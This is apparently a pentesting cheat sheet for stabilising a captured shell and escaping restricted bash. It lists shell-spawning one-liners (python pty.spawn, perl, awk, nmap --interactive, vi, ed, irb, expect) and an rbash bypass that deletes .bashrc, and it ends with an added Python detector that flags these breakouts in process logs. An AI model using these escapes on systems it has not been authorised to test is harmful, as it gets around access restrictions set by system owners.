# credit: the amazing sirensecurity
# https://sirensecurity.io/blog/break-out-get-that-tty/
* Grab a valid tty.
* What OS are you on? Grab access to those binaries fast by exporting each environment variable. Debian/CentOS/FreeBSD
* Want a color terminal to easily tell apart file permissions? Directories? Files?
* Fastest way to list out the files in a directory, show size, show permissions, human readable.
* Make this shell stable.
--- PYTHON
python -c 'import pty; pty.spawn("/bin/bash")'
# (follow below steps)
--- PYTHON3
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color ; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
alias ll='ls -lsaht --color=auto'
# Ctrl + Z to background the process
stty raw -echo ; fg ; reset ; stty columns 200 rows 200
# Return key
--- RESTRICTED BASH (PT1)
Is this rbash (Restricted Bash)? PT1
$ vi
:set shell=/bin/sh
:shell
$ vim
:set shell=/bin/sh
:shell
--- RESTRICTED BASH (PT2)
Is this rbash (Restricted Bash)? PT2
(This requires ssh user-level access)
ssh <user>@<host> "/bin/sh"
rm $HOME/.bashrc
exit
(Bash Shell)
Is python present on the target machine?
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
--- PERL
Is perl present on the target machine?
perl -e 'exec "/bin/bash";'
perl -e 'exec "/bin/sh";'
--- AWK
Is AWK present on the target machine?
awk 'BEGIN {system("/bin/bash -i")}'
awk 'BEGIN {system("/bin/sh -i")}'
--- NMAP
Is Nmap present on the target machine?
nmap --interactive
nmap> !sh
--- MISC
# ed
ed
!sh
# IRB
IRB Present on the target machine?
exec "/bin/sh"
# Expect:
expect -v
expect version 5.45.4
$ cat > /tmp/shell.sh <<EOF
#!/usr/bin/expect
spawn bash
interact
EOF
$ chmod u+x /tmp/shell.sh
$ /tmp/shell.sh
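--- DETECTION (ADDED EXAMPLE)
Added here as a defender's view of the list above, not part of the original notes or the credited blog post: a small matcher for process-creation telemetry (auditd execve records, EDR process events) that flags these breakouts. The ProcEvent shape, the rule names and the sample events are assumptions constructed for illustration.

```python
import re
from typing import NamedTuple

class ProcEvent(NamedTuple):
    parent: str   # name of the parent process
    cmdline: str  # argv of the new process joined with spaces

# One-liners from the list above that are visible on the command line.
CMDLINE_RULES = {
    "python-pty-spawn": re.compile(r"\bpython[0-9.]*\s+-c\s+.*\bpty\.spawn\("),
    "perl-exec-shell": re.compile(r"\bperl\s+-e\s+.*\bexec\s+[\"']?/bin/(ba)?sh"),
    "awk-system-shell": re.compile(r"\bawk\s+.*\bsystem\(\s*[\"']?/bin/(ba)?sh"),
    "nmap-interactive": re.compile(r"\bnmap\s+(.*\s)?--interactive\b"),
}

# vi, vim, ed, irb, nmap and expect start the shell from inside the program,
# so only the parent/child relationship shows up in process telemetry.
SHELL_PARENTS = {"vi", "vim", "ed", "irb", "nmap", "expect"}
# Interactive shell only: "sh -c <cmd>" (e.g. vim's :!make) is not flagged.
INTERACTIVE_SHELL = re.compile(r"^((/usr)?/bin/)?(ba)?sh(\s+-i)?\s*$")

def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule this process event matches."""
    hits = [name for name, rx in CMDLINE_RULES.items() if rx.search(ev.cmdline)]
    if ev.parent in SHELL_PARENTS and INTERACTIVE_SHELL.match(ev.cmdline):
        hits.append("shell-child-of-" + ev.parent)
    return hits

def scan(events):
    """Keep only the events that matched at least one rule."""
    return [(ev, hits) for ev in events if (hits := classify(ev))]

# Constructed sample telemetry (not captured from a real host).
SAMPLE_EVENTS = [
    ProcEvent("sh", "python3 -c import pty; pty.spawn(\"/bin/bash\")"),
    ProcEvent("rbash", "awk BEGIN {system(\"/bin/sh -i\")}"),
    ProcEvent("rbash", "perl -e exec \"/bin/sh\";"),
    ProcEvent("vim", "/bin/sh"),
    ProcEvent("expect", "bash"),
    ProcEvent("vim", "/bin/sh -c ctags -R ."),       # benign: vim running a command
    ProcEvent("bash", "awk {print $1} access.log"),  # benign
    ProcEvent("bash", "python3 manage.py migrate"),  # benign
]

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(f"{ev.parent:>7} -> {ev.cmdline!r}: {', '.join(hits)}")
```

The parent/child rule is what catches the vi, ed and irb entries, since ":shell" and "!sh" are typed inside the program and never appear in any command line.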